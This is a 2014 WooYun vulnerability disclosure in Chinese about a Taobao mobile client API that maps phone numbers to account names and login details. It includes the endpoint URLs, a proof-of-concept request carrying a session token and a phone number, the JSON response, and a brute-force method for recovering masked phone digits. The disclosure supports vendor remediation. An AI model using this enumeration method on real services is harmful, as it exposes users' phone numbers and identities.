当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-066949

漏洞标题:淘宝网某手机客户端可以获取手机账号等敏感信息

相关厂商:淘宝网

漏洞作者: 104705824

提交时间:2014-07-02 11:29

修复时间:2014-08-16 11:30

公开时间:2014-08-16 11:30

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-07-02: 细节已通知厂商并且等待厂商处理中
2014-07-04: 厂商已经确认,细节仅向厂商公开
2014-07-14: 细节向核心白帽子及相关领域专家公开
2014-07-24: 细节向普通白帽子公开
2014-08-03: 细节向实习白帽子公开
2014-08-16: 细节向公众公开

简要描述:

可以通过手机号码获取到淘宝账号等敏感信息,也可以通过账号获取到手机号码等敏感信息,会造成大量用户信息隐私泄露。

详细说明:

该漏洞存在于旺信(阿里旺旺手机客户端安卓版),1.7版以下是可以看到的,最新版本虽然在软件界面中看不到,单接口一样存在的!
测试的是1.77版 在添加好友中有个精确查找功能,可以根据手机号或淘宝账号查找,这种设计就很容易泄露私隐信息,所以到了2.0版本以上的程序员可能意识到会泄露私隐取消了根据手机号查找账号的功能。最新版本只有根据账号查找。但这个接口还是存在的!、
下面的接口两个都是可以用的:
http://yiliao.hupan.com/api/wxuser/nameCard.json?userId=登陆的账号&token=登陆账号的token&username=手机号或账号
http://wxapi.taobao.com/api/wxuser/nameCard.json?userId=登陆的账号&token=登陆账号的token&username=手机号或账号
1.根据手机号获取淘宝账号
直接用该接口就可以获取到登陆账号信息,最近登陆时间,登陆时用的手机系统信息。
返回
tbnick 代表淘宝账号
os_version 代表登陆时用的手机系统版本比如是安卓或者iphone
last_login_time 代表最后登陆时间
2.根据账号获取手机号码
这个不是直接可以获取到,但可以通过暴力破解方式很容易获取到。
输入账号后返回的信息中包含了
"phone_num":"189*****888"的手机号码方式,也就是只隐藏了中间了5位号码,也就可以造成暴力破解的可能。枚举189*****888号码段,根据接口返回淘宝账号和要破解的账号对比,账号一样就表示该手机号码就是要破解的账号手机号码。 理论上就是10万次左右,破解只是时间问题,关键是接口未做暴力破解的任何限制!

漏洞证明:

用的是本人淘宝小号测试
http://yiliao.hupan.com/api/wxuser/nameCard.json?userId=cnhhupan%E4%BD%8E%E8%B0%83%E7%9A%84%E7%94%B7%E4%BA%BA70&token=92f475616433c1912a016d5dc2dc2c98_v1&username=13560162597
返回信息
{"code":200,"msg":"success","data":{"user_id":"cnhhupan低调的男人70","name":"dtdnr07","avatar":"http://img02.taobaocdn.com/tps/i2/T1zHHoXapqXXbCFbsb-100-100.jpg_120x120.jpg","gender":"保密","full":"dtdnr07","shortname":"DTDNR07","phone_num":"135*****597","last_login_time":1404267878,"verify_flag":1,"os_version":"android_3.1","ww_user":1,"tbnick":"低调的男人70","settingKey1":"1","settingVaules":{"nick":"","receiveWwPcOL":"1","keepOnline":"1","pushWwPcOL":"0","runInBackground":"0","tribeRecvFlags":"[]","nonPushAtNight":"0","msgRemindNoDisturb":"{\"endMinute\":0,\"endHour\":8,\"startMinute\":0,\"type\":1,\"startHour\":23}","logis":"0","eAppSummaryViews":"[{\"pid\":2,\"id\":1},{\"pid\":1,\"id\":1},{\"pid\":3,\"id\":1},{\"pid\":4,\"id\":1}]","eAppWidgets":"[{\"pid\":2,\"id\":1},{\"pid\":1,\"id\":1},{\"pid\":3,\"id\":1},{\"pid\":4,\"id\":1}]","eAppStatistics":"[]","eAppPcStatistics":"[]","eAppCategory":"[2,1,3,4]"},"userIdentity":1}}

修复方案:

1.建议从接口取消用手机查找账号功能
2.手机号码公开显示是否采取显示后4位方式?
3.取消显示最后登陆时间显示
4.取消显示登陆手机版本
5.抓包发现旺信中很多采用了HTTP接口,建议采用TCP或UDP加密通讯,至少采用HTTP接口也做下加密处理。

版权声明:转载请注明来源 104705824@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2014-07-04 09:59

厂商回复:

亲,感谢您的关注和支持,该问题我们正在修复!

最新状态:

暂无